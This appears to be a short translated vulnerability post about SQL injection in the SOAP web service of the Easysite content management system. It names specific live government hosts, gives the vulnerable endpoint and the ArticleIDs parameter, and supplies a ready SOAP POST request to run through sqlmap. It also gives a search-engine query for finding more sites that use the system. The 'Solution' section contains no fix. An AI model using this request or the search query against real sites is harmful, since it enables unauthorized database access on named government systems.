Easysite content management system a simple and crude SQL Injection

Easysite content management system a simple and crude SQL Injection

Web services will not lie to anyone ~!

A large number of gov sites use the easysite content management system.

Detailed description:

1. soap Injection

Easysite webservice file:

http://www.py.gov.cn/DesktopModules/C_Info/WebService/C_InfoService.asmx

2. The ArticleIDs parameter has the SQL injection vulnerability.

Run it in sqlmap.

POST /DesktopModules/C_Info/WebService/C_InfoService.asmx HTTP/1.1
Host: dynamic.xmedu.gov.cn
Content-Type: text/xml; charset=utf-8
Content-Length: length
SOAPAction: "http://tempuri.org/GetArticleHitsArray"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetArticleHitsArray xmlns="http://tempuri.org/">
      <ArticleIDs>string</ArticleIDs>
    </GetArticleHitsArray>
  </soap:Body>
</soap:Envelope>

Proof of vulnerability:

If you don't know who is using easysite, google (If you can open it) will:







Inurl: asmx comment topmodules



(N domain names of the General Administration of Customs are all in this system)

Solution:

GOV websites do not require RANK. Do not cross-province websites.